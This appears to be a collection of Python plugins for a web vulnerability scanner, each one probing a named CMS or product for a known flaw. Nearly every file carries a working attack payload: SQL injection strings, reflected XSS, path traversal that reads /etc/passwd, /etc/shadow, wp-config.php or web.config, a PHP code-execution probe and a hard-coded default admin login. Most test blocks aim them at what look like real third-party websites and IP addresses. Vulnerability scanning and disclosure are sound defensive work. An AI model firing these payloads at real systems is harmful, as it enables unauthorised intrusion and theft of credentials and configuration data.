 1 | #Referer:	http://www.securityfocus.com/archive/1/534437
 2 | def assign(service, arg):
 3 |     if service == "wordpress":
 4 |         return True, arg
 5 | 
 6 | def audit(args):
 7 |     payload = 'wp-admin/admin.php?page=pods&action=edit&id=4%22></a><script>alert(1)</script><!--'
 8 |     verify_url = args + payload
 9 |     code, head, content, errcode,finalurl = curl.curl(verify_url)
10 |     if code==200 and '<script>alert(1)</script>' in content:
11 |         security_info(verify_url)
12 | 
13 | if __name__ == '__main__':
14 |     from dummy import *
15 |     audit(assign('wordpress', 'http://www.misssky.cn/')[1])
16 | 


--------------------------------------------------------------------------------
/plugins/discuz/1466.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #_Author_= Yuku
 4 | #_Refer_ = http://www.wooyun.org/bugs/wooyun-2010-079517
 5 | 
 6 | def assign(service, arg):
 7 |     if service == "discuz":
 8 |         return True, arg
 9 | 
10 | def audit(arg):
11 |     payload = 'plugin.php?id=hux_wx:hux_wx&uid=1&mod=../../../..&ac=robots.txt%00'
12 |     url = arg + payload
13 |     code, head, res, errcode, _ = curl.curl(url)
14 |     if code == 200 and "User-agent" in res:
15 |         security_hole(url)
16 | 
17 | if __name__ == '__main__':
18 |     from dummy import *
19 |     audit(assign('discuz', 'http://www.yingji8.com/')[1])


--------------------------------------------------------------------------------
/plugins/empire_cms/2219.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #__Author__ = 烽火戏诸侯
 4 | #_PlugName_ = 帝国CMS(EmpireCMS)商品评分插件注入漏洞
 5 | 
 6 | def assign(service, arg):
 7 |     if service == "empire_cms":
 8 |         return True, arg
 9 | 
10 | def audit(arg):
11 |     payload = 'pf/rate.php?id=-1+UNION+ALL+SELECT+NULL,CONCAT(0x23,0x747971,0x23)--' 
12 |     target = arg + payload 
13 |     code, head,res, errcode, _   = curl.curl2(target) 
14 |     if code==200 and '#tyq#' in res:
15 |         security_hole(target)
16 | 
17 | if __name__ == '__main__':
18 |     from dummy import *
19 |     audit(assign('empire_cms', 'http://www.mongol.cn/')[1])


--------------------------------------------------------------------------------
/plugins/gnuboard/250.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | import re
 3 | import urlparse
 4 | 
 5 | def assign(service, arg):
 6 |     if service != "gnuboard":
 7 |         return
 8 |     return True, arg
 9 | 
10 | def audit(arg):
11 |     url = arg
12 |     code, head, res, errcode, _ = curl.curl(url + 'cheditor5/imageUpload/delete.php?img=xxx')
13 |     if code == 200:
14 |         m = re.search('No such file or directory in <b>([^<]+)</b> on line <b>(\d+)</b>', res)
15 |         if m:
16 |             security_info(m.group(1))
17 | 
18 | 
19 | if __name__ == '__main__':
20 |     from dummy import *
21 |     audit(assign('gnuboard', 'http://www.example.com/')[1])


--------------------------------------------------------------------------------
/plugins/phpcms/155.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #PHPCMS 2008 yellow page command execute
 4 | #__author__ = 'pyphrb'
 5 | 
 6 | def assign(service, arg):
 7 |     if service == "phpcms":
 8 |         return True, arg
 9 | 
10 | def audit(arg):
11 |     url = arg
12 |     _, head, body, _, _ = curl.curl(url + '/yp/product.php?pagesize=%24%7B%40%70%72%69%6E%74%28%6D%64%35%28%33%2E%31%34%31%35%29%29%7D')
13 |     if body and body.find('63e1f04640e83605c1d177544a5a0488') != -1:
14 |         security_hole(url)
15 | 
16 | if __name__ == '__main__':
17 |     from dummy import *
18 |     audit(assign('phpcms', 'http://www.example.com/')[1])


--------------------------------------------------------------------------------
/plugins/seentech_uccenter/1827.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #refer:http://www.wooyun.org/bugs/wooyun-2010-0126977
 4 | 
 5 | def assign(service, arg):
 6 |     if service == 'seentech_uccenter':
 7 |         return True, arg
 8 |         
 9 | def audit(arg):
10 |     payload = "ucenter/tjbb/webmail_raw.php?path=Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA=="
11 |     code,_,res,_,_ = curl.curl2(arg+payload)
12 |     if code==200 and 'root:/bin/bash' in res :
13 |         security_warning(arg+payload)
14 | if __name__ == '__main__':
15 |     from dummy import *
16 |     audit(assign('seentech_uccenter', 'https://60.223.226.154/')[1])


--------------------------------------------------------------------------------
/dummy/__init__.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | # package for test
 4 | 
 5 | from thirdparty import miniCurl
 6 | from thirdparty import ThreadPool
 7 | from thirdparty import hackhttp
 8 | from lib.utils import until
 9 | 
10 | def security_hole(msg,k = ''):
11 |     print k,msg
12 | 
13 | def security_info(msg,k = ''):
14 |     print k,msg
15 | 
16 | def security_note(msg,k = ''):
17 |     print k,msg
18 | 
19 | def security_warning(msg,k = ''):
20 |     print k,msg
21 | 
22 | def debug(msg):
23 |     print msg
24 | 
25 | ThreadPool = ThreadPool.w8_threadpool
26 | curl = miniCurl.Curl()
27 | hackhttp = hackhttp.hackhttp()
28 | util = until


--------------------------------------------------------------------------------
/plugins/discuz/450.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python 
 2 | # -*- coding: utf-8 -*- 
 3 | #__author__ = '真爱' 
 4 | #Name:Comsenz 系统维护工具箱（UCenter专用版）
 5 | import re
 6 | def assign(service, arg): 
 7 |   if service == "discuz": 
 8 |     return True, arg 
 9 | def audit(arg):
10 |   payload = '/uc_server/uctools.php'
11 |   verify_url = arg + payload 
12 |   code, head,res, errcode, _ = curl.curl(verify_url) 
13 |   if code == 200:
14 |     m = re.search("Comsenz",res)
15 |     if m:
16 |     	security_hole(verify_url + ' Comsenz 系统维护工具箱（UCenter专用版）')
17 | 
18 | if __name__ == '__main__': 
19 |   from dummy import * 
20 |   audit(assign('discuz', 'http://www.example.com/')[1])


--------------------------------------------------------------------------------
/plugins/joomla/147.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #__author__ = 'pyphrb'
 4 | 
 5 | def assign(service, arg):
 6 |     if service == "joomla":
 7 |         return True, arg
 8 | 
 9 | def audit(arg):
10 |     url = arg
11 |     _, head, body, _, _ = curl.curl(url + '/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=-1+union+all+select+1,concat_ws(0x3a,0x3a,md5(3.1415),0x3a),3,4,5,6,7,8,9')
12 |     if body and body.find('63e1f04640e83605c1d177544a5a0488') != -1:
13 |         security_hole(url)
14 | 
15 | if __name__ == '__main__':
16 |     from dummy import *
17 |     audit(assign('joomla', 'http://www.example.com/')[1])
18 | 


--------------------------------------------------------------------------------
/plugins/luepacific/2034.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*
 3 | #蓝太平洋网站决策支持系统敏感信息泄露
 4 | import urlparse
 5 | 
 6 | def assign(service, arg):
 7 |     if service == 'luepacific':
 8 |         arr = urlparse.urlparse(arg)
 9 |         return True, '%s://%s/' % (arr.scheme, arr.netloc)
10 |         
11 | def audit(arg):
12 |     payload = "webengine/backuppro/backup/webeng~1.bz2"
13 |     code,head,res,_,_ = curl.curl2(arg+payload)
14 |     if code ==200 and 'application/x-bzip2' in head:
15 |         security_warning(arg+payload)
16 | if __name__ == '__main__':
17 |     from dummy import *
18 |     audit(assign('luepacific','http://182.48.112.221/')[1])


--------------------------------------------------------------------------------
/plugins/metinfo/152.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #__author__ = 'xfkxfk'
 4 | 
 5 | def assign(service, arg):
 6 |     if service == "metinfo":
 7 |         return True, arg
 8 | 
 9 | def audit(arg):
10 |     url = arg
11 |     _, head, body, _, _ = curl.curl(url + '/include/thumb.php?x=1&y=/../../../config&dir=config_db.php')
12 |     if body and "<?php" in body and "con_db_host" in body and "con_db_name" in body:
13 |         security_hole(url + '/include/thumb.php?x=1&y=/../../../config&dir=config_db.php')
14 | 
15 | if __name__ == '__main__':
16 |     from dummy import *
17 |     audit(assign('metinfo', 'http://www.158185187.com/')[1])


--------------------------------------------------------------------------------
/plugins/phpshe/1140.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python 
 2 | # -*- coding: utf-8 -*- 
 3 | #__author__ = 'ifk' 
 4 | #Refer http://www.wooyun.org/bugs/wooyun-2010-065479
 5 | 
 6 | def assign(service, arg): 
 7 |     if service == "phpshe":
 8 |         return True, arg
 9 | 		
10 | def audit(arg): 
11 |     payload = 'install/index.php?step=setting'
12 |     code, head, res, errcode, _ = curl.curl2(arg+payload)
13 |     if code == 200 and '<input type="text" name="admin_name"' in res:
14 |         security_hole('未授权重装 '+arg+payload)        
15 | 				
16 | if __name__ == '__main__': 
17 |     from dummy import *
18 |     audit(assign('phpshe', 'http://tiandifashion.com/')[1])


--------------------------------------------------------------------------------
/plugins/umail/1634.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #Refer http://www.unhonker.com/bug/1513.html
 4 | import re
 5 | 
 6 | def assign(service, arg):
 7 |     if service == "umail":
 8 |         return True, arg
 9 | 
10 | def audit(arg):
11 |     url = arg
12 |     code, head, res, errcode, _ = curl.curl(url + 'webmail/userapply.php?execadd=333&DomainID=111')
13 |     if code == 200:
14 |         r = re.search('MySQL result resource in <b>([^<]+)</b>',res)
15 |         if r:
16 |             security_info(r.group(1))
17 | 
18 | if __name__ == '__main__':
19 |     from dummy import *
20 |     audit(assign('umail', 'http://mail.bcicc.com/')[1])


--------------------------------------------------------------------------------
/plugins/wordpress/1179.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | 
 4 | def assign(service, arg):
 5 |     if service == "wordpress":
 6 |         return True, arg
 7 | 
 8 | def audit(arg):
 9 |     payload = "wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress"
10 |     url = arg + payload
11 |     code, head, res, errcode, _ = curl.curl(url)
12 |     if code == 200 and 'root' in res:
13 |         security_hole(url)
14 | 
15 | if __name__ == '__main__':
16 |     from dummy import *
17 |     audit(assign('wordpress', 'http://www.example.com/')[1])


--------------------------------------------------------------------------------
/plugins/74cms/600.py:
--------------------------------------------------------------------------------
 1 | import re
 2 | 
 3 | 
 4 | def assign(service,arg):
 5 |     if service == "74cms":
 6 |         return True,arg
 7 | 
 8 | def audit(arg):
 9 |     url = arg
10 |     code, head, res, errcode, _ =curl.curl(url + "plus/ajax_officebuilding.php?act=key&key=asd%E9%94%A6%27%20uniounionn%20selselectect"
11 |                    "%201,2,3,md5(7836457),5,6,7,8,9%23")
12 |     if code == 200:
13 |         if "3438d5e3ead84b2effc5ec33ed1239f5" in res:
14 |             security_info('find sql injection: ' + arg+ 'plus/ajax_officebuilding.php')
15 | if __name__ == '__main__':
16 |     from dummy import *
17 |     audit(assign('74cms', 'http://www.example.com/')[1])


--------------------------------------------------------------------------------
/plugins/acsoft/2346.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/evn python 
 2 | #--coding:utf-8--*--
 3 | #Name: 安财软件通用报销系统任意文件下载
 4 | #Refer:http://www.wooyun.org/bugs/wooyun-2014-064190
 5 | #Author:xq17
 6 | def assign(service, arg):
 7 |     if service == "acsoft":
 8 |         return True, arg
 9 | 
10 | def audit(arg):
11 |     payload = arg + "DownLoadPage.aspx?FileName=/web.config"
12 |     code, head, res, errcode, _ = curl.curl2(payload)
13 |     if code ==200 and 'system.web' in res:
14 |          security_info(payload+':Any reading ' )
15 |          
16 | if __name__ == '__main__':
17 |         from dummy import *
18 |         audit(assign('acsoft','http://122.224.179.212:8000/')[1])
19 | 


--------------------------------------------------------------------------------
/plugins/chengrui_edu/2656.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/evn python
 2 | #-*-:coding:utf-8 -*-
 3 | #Author:404
 4 | #Name:
 5 | #Refer:http://www.wooyun.org/bugs/wooyun-2014-071575
 6 | 
 7 | def assign(service,arg):
 8 |     if service=="chengrui_edu":
 9 |         return True,arg 
10 |     
11 | 
12 | 
13 | def  audit(arg):
14 |     url=arg+"log.txt"
15 |     code,head,res,errcode,_=curl.curl2(url)
16 |     if code==200 and 'User' and 'Password' in res:
17 |             security_hole(url)
18 | 
19 | if __name__=="__main__":
20 |     from dummy import *
21 | 
22 |     audit(assign('chengrui_edu','http://demo.edudu.net/')[1])
23 |     audit(assign('chengrui_edu','http://oa.jjzyzz.com/')[1])


--------------------------------------------------------------------------------
/plugins/discuz/80.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python   
 2 | import re  
 3 |   
 4 | def assign(service, arg):  
 5 |     if service != "discuz":  
 6 |         return  
 7 |     return True, arg  
 8 |   
 9 | def audit(arg):  
10 |     url = arg  
11 |     code, head, res, errcode, _ = curl.curl(url + 'api.php?mod[]=Seay')  
12 |     if code == 200:  
13 |         m = re.search('<b>Warning</b>:[^\r\n]+or an integer in <b>([^<]+)api\.php</b> on line <b>(\d+)</b>', res)
14 |         if m:  
15 |             security_info(m.group(1))  
16 |   
17 |   
18 | if __name__ == '__main__':  
19 |     from dummy import *  
20 |     audit(assign('discuz', 'http://www.feifeiz.com/')[1])  
21 | 


--------------------------------------------------------------------------------
/plugins/libsys/1778.py:
--------------------------------------------------------------------------------
 1 | #! /usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #author:    oneroy@qq.com
 4 | 
 5 | import re
 6 | 
 7 | def assign(service, arg):
 8 |     if service == "libsys":
 9 |         return True, arg
10 | 
11 | def audit(arg):
12 |     payload = "admin/login.php"
13 |     url = arg + payload
14 |     postpayload = 'username=opac_admin&passwd=huiwen_opac'
15 |     code, head, res, errcode, _  = curl.curl2(url,postpayload)
16 |     if code == 302 and  "cfg_basic.php" in head:
17 |         security_warning(url)
18 | 
19 | 
20 | if __name__ == '__main__':
21 |     from dummy import *
22 |     audit(assign('libsys','http://libopac.fjnu.edu.cn/')[1])


--------------------------------------------------------------------------------
/plugins/nitc/2599.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/evn python 
 2 | #--coding:utf-8--*--
 3 | #Name:NITC营销系统SQL注入漏洞 get
 4 | #Refer:http://wooyun.org/bugs/wooyun-2015-0152825
 5 | #Author:xq17
 6 | 
 7 | def assign(service, arg):
 8 |     if service == "nitc":
 9 |         return True, arg
10 | 
11 | def audit(arg):
12 |     url = arg + "suggestwordList.php?searchWord=a&language=1%20or%20updatexml(1,concat(0x5c,md5(1)),1)%23--"
13 |     code, head, res, errcode, _ = curl.curl2(url)
14 |     if code!=0 and 'c4ca4238a0b923820dcc509a6f75849' in res:
15 |         security_hole(url)
16 | if __name__=="__main__":
17 |     from dummy import *
18 |     audit(assign('nitc','http://www.slzzx.com/')[1])


--------------------------------------------------------------------------------
/plugins/ns-asg/287.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #__author__ = '1c3z'
 4 | #refer :http://www.wooyun.org/bugs/wooyun-2014-058932
 5 | 
 6 | def assign(service, arg):
 7 |     if service == "NS-ASG":
 8 |         return True, arg
 9 | 
10 | def audit(arg):
11 |     url = arg + "debug/rproxy_diag.php?action=download&filename=/etc/shadow"
12 |     code, head, res, errcode,finalurl =  curl.curl(url)
13 |     if res.find('root:$1$') != -1 :
14 |         security_hole('Local File download vulnerability:' + url)
15 | 
16 | if __name__ == '__main__':
17 |     from dummy import *
18 |     audit(assign('NS-ASG', 'https://119.167.113.86:8888/')[1])
19 | 


--------------------------------------------------------------------------------
/plugins/qibocms/1741.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | import re
 4 | def assign(service, arg):
 5 |     if service == "qibocms":
 6 |         return True, arg
 7 | 
 8 | def audit(arg):
 9 |     payload='exam/exam_order.php?id=29&and=and%201=2%20union%20select%201,2,md5(1234),4,5,6,7,md5(1234),9,10,11%20from%20qb_members'
10 |     url=arg+payload
11 |     code, head, res, errcode, _ = curl.curl2(url)
12 |     if code == 200 and "81dc9bdb52d04dc20036dbd8313ed055" in res:
13 |         security_hole(url)
14 | 
15 | if __name__ == '__main__':
16 |     from dummy import *
17 |     audit(assign('qibocms','http://127.0.0.1:8080/qibocms/')[1])
18 | 
19 | 


--------------------------------------------------------------------------------
/plugins/wordpress/2272.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | import re
 3 | 
 4 | def assign(service, arg):
 5 |     if service == "wordpress":
 6 |         return True, arg
 7 | 
 8 | def audit(arg):
 9 |     payload = 'wp-content/plugins/eshop-magic/download.php?file=../../../../wp-config.php'
10 |     verify_url = arg + payload
11 |     code, head, res, errcode, _ = curl.curl2(verify_url)
12 | 
13 |     if code == 200:
14 |         m = re.search("define\('DB_PASSWORD'", res)
15 |         if m:
16 |             security_hole(verify_url)
17 | 
18 | if __name__ == '__main__':
19 |     from dummy import *
20 |     audit(assign('wordpress', 'http://127.0.0.1/wordpress/')[1])
21 | 


--------------------------------------------------------------------------------
/plugins/yongyou_zhiyuan_a6/2003.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*
 3 | # 用友致远A6协同系统账号密码泄露
 4 | import re
 5 | 
 6 | def assign(service, arg):
 7 |     if service == 'yongyou_zhiyuan_a6':
 8 |         return True, arg
 9 |         
10 | def audit(arg):
11 |     reg = re.compile(r'[a-fA-F0-9]{32,32}')
12 |     payload = "yyoa/ext/https/getSessionList.jsp?cmd=getAll"
13 |     code,_,res,_,_ = curl.curl2(arg+payload)
14 |     m = reg.findall(res)
15 |     if m and code == 200:
16 |         security_warning(arg+payload)
17 | if __name__ == '__main__':
18 |     from dummy import *
19 |     audit(assign('yongyou_zhiyuan_a6','http://222.175.187.147:8081/')[1])


--------------------------------------------------------------------------------
/plugins/74cms/1687.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python 
 2 | # -*- coding: utf-8 -*- 
 3 | #__author__ = '1610519747@qq.com' 
 4 | import re
 5 | 
 6 | def assign(service, arg):
 7 |     if service == "74cms":
 8 |         return True, arg
 9 | 
10 | def audit(arg): 
11 |     payload = '/jobs/jobs-list.php?key=%22%20autofocus%20onfocus=alert%281%29%20style=%22%22'
12 |     code, head, res, errcode, _ = curl.curl2(arg+payload)
13 |     if code == 200 and '" autofocus onfocus=alert(1) style=' in res:
14 |         security_info('反射型 xss '+arg+payload)   
15 | 
16 | if __name__ == '__main__':
17 |     from dummy import *
18 |     audit(assign('74cms', 'http://demo.74cms.com')[1])
19 | 
20 | 


--------------------------------------------------------------------------------
/plugins/phpweb/166.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | def assign(service, arg):
 4 |     if service == "phpweb":
 5 |         return True, arg
 6 | 
 7 | def audit(arg):
 8 |     url = arg + 'news/class/index.php?myord=1%20and%20(select%201%20from%20(select%20count(*),concat(md5(521521),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1'
 9 |     _, head, body, _, _ = curl.curl(url)
10 |     if body and body.find('35fd19fbe470f0cb5581884fa700610f') != -1:
11 |         security_hole(url)
12 | 
13 | if __name__ == '__main__':
14 |     from dummy import *
15 |     audit(assign('phpweb', 'http://www.jxcfs.com/')[1])
16 | 


--------------------------------------------------------------------------------
/plugins/shop7z/2307.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #__Author__ = 烽火戏诸侯
 4 | #_PlugName_ = Shop7z /admin/lipinadd.asp越权访问
 5 | import re
 6 | 
 7 | def assign(service, arg):
 8 |     if service == "shop7z":
 9 |         return True, arg
10 | 
11 | def audit(arg):
12 |     payload = 'admin/lipinadd.asp'
13 |     target = arg + payload
14 |     code, head,res, errcode, _   = curl.curl2(target) 
15 |     if  code == 200 and 'name="lipinname"' in res and 'name="showflag"' in res:
16 |         security_hole(target)
17 |         
18 | 
19 | if __name__ == '__main__':
20 |     from dummy import *
21 |     audit(assign('shop7z', 'http://www.99ysbjw.com/')[1])


--------------------------------------------------------------------------------
/plugins/suyaxing2004/1138.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python 
 2 | # -*- coding: utf-8 -*- 
 3 | #__author__ = 'ifk' 
 4 | #Refer http://www.wooyun.org/bugs/wooyun-2010-063128
 5 | 
 6 | def assign(service, arg): 
 7 |     if service == "suyaxing2004":
 8 |         return True, arg
 9 | 		
10 | def audit(arg): 
11 |     payload = 'ws2004/sysManage/Resource/add/addResource.asp?FunID=1'
12 |     code, head, res, errcode, _ = curl.curl2(arg+payload)
13 |     if code == 200 and 'zip' in res:
14 |         security_hole('未经授权访问 '+arg+payload)
15 | 				
16 | if __name__ == '__main__': 
17 |     from dummy import *
18 |     audit(assign('suyaxing2004', 'http://www.fzjcxx.cn/')[1])
19 | 	
20 | 


--------------------------------------------------------------------------------
/plugins/wordpress/1119.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python 
 2 | # -*- coding: utf-8 -*- 
 3 | #__author__ = 'K0thony'
 4 | #Exploit Title:Wordpress ibs-mappro Plugin Arbitrary File Download Vulnerability.py
 5 | def assign(service,arg):
 6 | 	if service == "wordpress":
 7 | 		return True,arg
 8 | def audit(arg):
 9 | 	payload = "wp-content/plugins/ibs-mappro/lib/download.php?file=../../../../wp-config.php"
10 | 	verify_url = arg + payload
11 | 	code, head, res, errcode, _ = curl.curl(verify_url)
12 | 	if code == 200 and 'DB_PASSWORD' in res:
13 | 		security_hole(verify_url)
14 | 
15 | if __name__=='__main__':
16 | 	from dummy import *
17 | 	audit(assign('wordpress','http://127.0.0.1/')[1])


--------------------------------------------------------------------------------
/plugins/wordpress/1639.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | #-*- coding:utf-8 -*-
 3 | #__Author__ = zhiyuan
 4 | #___Sertype___ = WordPress wp-miniaudioplayer任意文件下载漏洞
 5 | def assign(service, arg):
 6 |     if service == "wordpress":
 7 |         return True, arg
 8 | 
 9 | def audit(arg):
10 |     payload = 'wp-content/plugins/wp-miniaudioplayer/map_download.php?fileurl=/etc/passwd'
11 |     url = arg + payload
12 |     code, head, body, errcode, _url = curl.curl2(url)
13 |     if code == 200 and '/root:/bin/bash' in body:
14 |         security_hole(url)
15 | 
16 | if __name__ == '__main__':
17 |     from dummy import *
18 |     audit(assign('wordpress', 'http://baiemusic.fr/')[1])


--------------------------------------------------------------------------------
/plugins/able_g2s/1193.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | #-*- encoding:utf-8 -*-
 3 | #__author__ = '1c3z'
 4 | 
 5 | 
 6 | def assign(service, arg):
 7 |     if service == "able_g2s":
 8 |         return True, arg
 9 | 
10 | 
11 | def audit(arg):
12 |     payload = 'G2S/ShowSystem/CourseExcellence.aspx?page=1&level=%E5%9B%BD%E5%AE%B6%E7%BA%A7%27%20and%201=2%20(select%20db_name(1))---'
13 |     url = arg + payload
14 |     code, head,res, errcode, _ = curl.curl2(url)
15 |     if code == 200 and 'master' in res:
16 |         security_hole(url)
17 |                         
18 | if __name__ == '__main__':
19 |     from dummy import *
20 |     audit(assign('able_g2s', 'http://cc.sbs.edu.cn/')[1])


--------------------------------------------------------------------------------
/plugins/discuz/47.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | import re
 3 | import urlparse
 4 | 
 5 | def assign(service, arg):
 6 |     if service == "discuz":
 7 |         return True, arg
 8 | 
 9 | def audit(arg):
10 |     url = arg
11 |     code, head, res, errcode, _ = curl.curl(url + 'uc_server/control/admin/db.php')
12 |     if code == 200:
13 |         m = re.search('not found in [<b>]*([^<]+)[</b>]* on line [<b>]*(\d+)', res)
14 |         if m:
15 |             security_info(m.group(1))
16 | 
17 | 
18 | if __name__ == '__main__':
19 |     from dummy import *
20 |     audit(assign('discuz', 'http://www.ytjt.com.cn/')[1])
21 |     audit(assign('discuz', 'http://www.lockbay.cn/')[1])
22 | 


--------------------------------------------------------------------------------
/plugins/dkcms/105.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #__author__ = 'Ario'
 4 | 
 5 | def assign(service, arg):
 6 |     if service == "dkcms":
 7 |         return True, arg
 8 | 
 9 | def audit(arg):
10 |     url = arg
11 |     for db in ['data/dkcm_ssdfhwejkfs.mdb', '_data/___dkcms_30_free.mdb', '_data/I^(()UU()H.mdb']:
12 |         code, head, _, _, _ = curl.curl('-I ' + url + db)
13 |         if code == 200 and head.find('application/x-msaccess') != -1:
14 |             security_hole(url + db)
15 |             break
16 | 
17 | if __name__ == '__main__':
18 |     from dummy import *
19 |     audit(assign('dkcms', 'http://www.gxltgroup.com/')[1])
20 | 
21 | 


--------------------------------------------------------------------------------
/plugins/douphp/434.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #__author__ = '1c3z'
 4 | #ref http://www.wooyun.org/bugs/wooyun-2010-076974
 5 | def assign(service, arg):
 6 |     if service == "douphp":
 7 |         return True, arg
 8 | 
 9 | def audit(arg):
10 |     url = arg + "admin/include/kindeditor/php/file_manager_json.php?path=/&dir=image"
11 |     code, head, res, errcode,finalurl =  curl.curl(url)
12 |     if res.find("total_count") != -1 and res.find("file_list") != -1:
13 |         security_warning('find Directory traversal:' + url)
14 | if __name__ == '__main__':
15 |     from dummy import *
16 |     audit(assign('douphp', 'http://127.0.0.1/douphp/')[1])


--------------------------------------------------------------------------------
/plugins/eyou/559.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/evn python
 2 | #-*-:coding:utf-8 -*-
 3 | #Author:404
 4 | #Name:亿邮系统敏感信息泄漏（产品版本和授权信息、系统信息、弱口令账号列表等）
 5 | #Refer:http://www.wooyun.org/bugs/wooyun-2014-061538
 6 | 
 7 | def assign(service,arg):
 8 |     if service=="eyou":
 9 |         return True,arg 
10 | 
11 | 
12 | def  audit(arg):
13 |     url=arg+"sysinfo.html"
14 |     code,head,res,errcode,_=curl.curl2(url)
15 |     if code==200 and "bin/bash" in res and 'mysqld' in res:
16 |         security_hole(url)
17 |     
18 | 
19 | if __name__=="__main__":
20 |     from dummy import *
21 |     audit(assign('eyou','http://210.45.208.2/')[1])
22 |     audit(assign('eyou','http://mail.workercn.cn/')[1])


--------------------------------------------------------------------------------
/plugins/nitc/2598.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/evn python 
 2 | #--coding:utf-8--*--
 3 | #Name:NITC营销系统SQL注入漏洞 get
 4 | #Refer:http://wooyun.org/bugs/wooyun-2015-0152825
 5 | #Author:xq17
 6 | 
 7 | def assign(service, arg):
 8 |     if service == "nitc":
 9 |         return True, arg
10 | 
11 | def audit(arg):
12 |     url = arg + "index.php?language_id=1%20or%20updatexml(1,concat(0x5c,md5(1)),1)%23--&is_protect=1&action=test"
13 |     code, head, res, errcode, _ = curl.curl2(url)
14 |     if code!=0 and 'c4ca4238a0b923820dcc509a6f75849' in res:
15 |         security_hole(url)
16 | if __name__=="__main__":
17 |     from dummy import *
18 |     audit(assign('nitc','http://www.zoyitec.com/')[1])


--------------------------------------------------------------------------------
/plugins/ns-asg/345.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | #__author__ = 'angel'
 4 | #refer :http://wooyun.org/bugs/wooyun-2014-058838
 5 | 
 6 | def assign(service, arg):
 7 |     if service == "NS-ASG":
 8 |         return True, arg
 9 | 
10 | def audit(arg):
11 |     url = arg + "commonplugin/Download.php?licensefile=../../../../../../../../../../etc/shadow"
12 |     code, head, res, errcode,finalurl =  curl.curl(url)
13 |     if res.find('root:$1$') != -1 :
14 |         security_hole('Local File download vulnerability:' + url)
15 | 
16 | if __name__ == '__main__':
17 |     from dummy import *
18 |     audit(assign('NS-ASG', 'http://www.example.com/')[1])
19 | 


--------------------------------------------------------------------------------
/plugins/thinkphp/1834.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | #-*- coding:utf-8 -*-
 3 | 
 4 | def assign(service, arg):
 5 |     if service == "thinkphp":
 6 |         return True, arg
 7 | 
 8 | def audit(arg):
 9 |     poc = arg + 'index.php?s=/home/article/view_recent/name/1'
10 |     header = "X-Forwarded-For:1') and extractvalue(1, concat(0x5c,(select md5(233))))#"
11 |     code, head, res, errcode, _ = curl.curl2(poc,header=header)
12 |     if code==200 and 'e165421110ba03099a1c0393373c5b4' in res:
13 |         security_hole("X-Forwarded-For SQLI:"+poc)
14 | 
15 | if __name__ == '__main__':
16 |     from dummy import *
17 |     audit(assign('thinkphp', 'http://www.binkanter.com/')[1])


--------------------------------------------------------------------------------
/plugins/fsmcms/1104.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python 
 2 | # -*- coding: utf-8 -*- 
 3 | #__author__ = 'ifk' 
 4 | #Refer http://www.wooyun.org/bugs/wooyun-2010-043380
 5 | 
 6 | import urlparse
 7 | def assign(service, arg): 
 8 |     if service == "fsmcms":
 9 |         return True, arg
10 | 		
11 | def audit(arg): 
12 |     payload = '/setup/index.jsp'
13 |     code, head, res, errcode, _ = curl.curl2(arg+payload)
14 |     if code == 200 and '</font><input type="text" name="SetUpPath"' in res :
15 |         security_hole('FSMCMS网站重装漏洞 '+ arg + payload)
